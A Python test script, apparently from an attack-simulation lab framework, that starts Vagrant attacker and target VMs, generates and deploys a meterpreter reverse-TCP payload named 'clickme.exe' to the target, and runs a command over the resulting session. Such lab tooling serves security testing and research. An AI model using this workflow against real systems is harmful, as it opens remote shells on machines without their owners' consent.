#!/usr/bin/env python3 """ Command line tool to interact with metasploit running on the attack server """ from app.machinecontrol import Machine from app.attack_log import AttackLog from app.metasploit import MSFVenom, Metasploit # For some local tests if __name__ == "__main__": # msfrpcd -S -P PASSWORD -u USER -f # attacker_ip = "" # target_ip = "" # Metasploit RPC PASSWORD = "PASSWORD" USER = "USER" attack_logger = AttackLog(2) attacker = Machine({ # "root": "systems/attacker1", "os": "linux", "vm_controller": { "type": "vagrant", "vagrantfilepath": "systems", # "ip": attacker_ip }, "vm_name": "attacker", "machinepath": "attacker1"}, attack_logger) attacker.up() # Target machine is attacker machine here target = Machine({ # "root": "systems/target3", "os": "linux", "vm_controller": { "type": "vagrant", "vagrantfilepath": "systems", # "ip": attacker_ip }, "vm_name": "target3", "machinepath": "target3"}, attack_logger) target.up() venom = MSFVenom(attacker, target, attack_logger) PAYLOAD_TYPE = "linux/x64/meterpreter_reverse_tcp" print(venom.generate_payload(payload=PAYLOAD_TYPE, architecture="x64", platform="linux", # lhost, format="elf", outfile="clickme.exe")) venom.generate_and_deploy(payload=PAYLOAD_TYPE, architecture="x64", platform="linux", lhost=attacker.get_ip(), format="elf", outfile="clickme.exe") # start msfrpcd on attacker # TODO get meterpreter session # TODO simple command to test metasploit = Metasploit(PASSWORD, attack_logger=attack_logger, attacker=attacker, username=USER) metasploit.start_exploit_stub_for_external_payload(payload=PAYLOAD_TYPE) print(metasploit.meterpreter_execute(["getuid"], 0)) # client = MsfRpcClient('yourpassword', ssl=True) target.halt() attacker.halt()